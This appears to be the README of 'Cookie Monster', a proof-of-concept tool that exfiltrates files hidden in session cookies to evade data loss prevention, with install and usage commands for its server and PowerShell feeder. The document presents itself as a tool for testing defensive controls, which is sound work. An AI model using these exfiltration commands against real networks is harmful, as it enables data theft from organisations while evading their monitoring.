Cookie Monster is a proof-of-concept data exfiltration tool. The basic premise behind it is hiding sensitive data in plain sight, within session cookies in web traffic, to evade detection by data loss prevention solutions. It consists of a two parts, a feeder client run from within the target's network, and a server for capturing the feeder's request and reassembling the data.
It can be used to transfer files, however it's a fairly immature, barebones implementation. In it's current form, it's better suited to testing the defensive controls than it is for an significant, malicious activity.
The server can be installed by the following command on a system with Node (the current codebase has been primarily tested on Node 18, but some earlier versions should work) npm install --global @professionallyevil/cookie-monster-exfil
You will also need a feeder, which can be found attached to the releases on this repo.
cookie-monster --out ./outputDir
- Import the module:
Import-Module .\CookieMonsterFeeder.ps1 - Send a file with:
Invoke-CMfeed -URL 'https://yourcookiemonsterserver.test' -file .\file.txt, where the file matches the file you want to send, and the URL is the protocol, hostname, and optionally the port of your server. e.g.http://127.0.0.1:3000,https://professionallyevil.com.
- The core functionality is working, but there is some functionality that is known to be missing. Skim the patch notes (they're concise) for details.
- There's no built-in support for using certificated and TLS directly through this app. If using for actual sensitive data, if is strongly recommended that you put it behind a reverse proxy that does support HTTPS, and to only use TLS for it.
Code original to this project is licensed under the MIT license. Response content colocated with the source code, in the subdirectories of https://github.com/ProfessionallyEvil/cookie-monster/tree/main/src/responses is sourced from public sources inlcuding apache.org, bulma.io, react.com, and purecss.io. This content retains its original licensing and copyrights.